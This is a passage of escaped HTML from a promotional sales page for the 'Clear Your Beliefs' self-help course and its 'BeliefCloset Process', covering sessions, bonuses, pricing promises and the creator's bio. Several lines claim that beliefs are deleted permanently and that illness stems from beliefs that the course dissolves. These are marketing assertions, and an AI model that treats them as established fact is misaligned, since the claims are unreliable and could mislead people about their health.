</strong></em><strong>permanently</strong>.</p>\n\n<h1>Imagine The Life You Desire</h1>\n\n<p><strong>Can you imagine this?</strong></p>\n<p><img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" /></p>\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n<p>&nbsp;</p>\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n\n<p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n<p>&nbsp;</p>\n<h1>Clear Whatever Is In The Way</h1>\n\n<p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Is This A Guaranteed Cure-All?</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p>\n\n<p>&nbsp;</p>\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n<p>&nbsp;</p>\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p>\n\n<p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p>\n\n<p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p>\n\n<p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p>\n\n<h1>With This Methodology, You Can Finally:</h1>\n\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p>\n\n<p>&nbsp;</p>\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px;margin-bottom: 5px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n<p>In gratitude, and with warm wishes for your total success,</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a></p>\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n<p>&nbsp;</p>\n<h1>Register Today and Discover What''s Possible</h1>\n\n<p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p>\n\n<p>&nbsp;</p>\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n<p><strong> In Session 1, you will:</strong></p>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n<p><strong> In Session 2, you will:</strong></p>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.</p>\n<p>This isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.</p>\n<p><em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...</p>\n\n<p>Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.</p>\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!\n\n<p><strong> In Session 3, you will:</strong></p>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.</p>\n<p>If you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?</p>\n<p>Humans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.</p>\n\n<p>&nbsp;</p>\n\n<p><strong> In Session 4, you will:</strong></p>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!</p>\n<p>What do you believe about earning a living in today''s economy?   Is money really the root of all evil?</p>\n<p>If you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?</p>\n\n<p><strong> In Session 5, you will:</strong></p>\n\nExamine your family and cultural beliefs about money, work, poverty and "deservingness."\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.</p>\n<p>Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?</p>\n\n<p><strong> In Session 6, you will:</strong></p>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.</p>\n<p>You''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.</p>\n<p>When you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.</p>\n\n<p><strong> In Session 7, you will:</strong></p>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n<p></p>\n<p>&nbsp;</p>\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\n<p>In addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.</p>\n<p>&nbsp;</p>\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?</p>\n<p>Lion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)</p>\n<p>Carista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.</p>\n<p>Learn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<p><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.</p>\n\n<p>Lion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.</p>\n\n<p>Anodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<p><strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:</p>\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a></p>\n\n<p>You''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" </p>\n<p>Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. </p>\n<p>It''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!</p>\n\n<p>&nbsp;</p>\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.</p>\n<p><em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.</p>\n<p>Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.</p>\n<p><strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong></p>\n<h1 id="package"></h1>\n<p style="text-align: right"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n<p>&nbsp;</p>\n\n<h1>Purchase Today and You''ll Receive:</h1>\n<p><strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.</p>\n<h3 style="font-size: 20px">Plus: <em>The Entire BONUS Collection:</em></h3>\n\n<strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<em><strong>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\nYour Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong>\n<strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\nMultimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)\n<strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>Optional:</strong> Professional Coaching Sessions.\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>About Lion Goodman</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.</p>\n<p>He is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em></p>\n<p>He is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em></p>\n<p>Lion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<p><em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em></p>\n<strong>– G. J., software 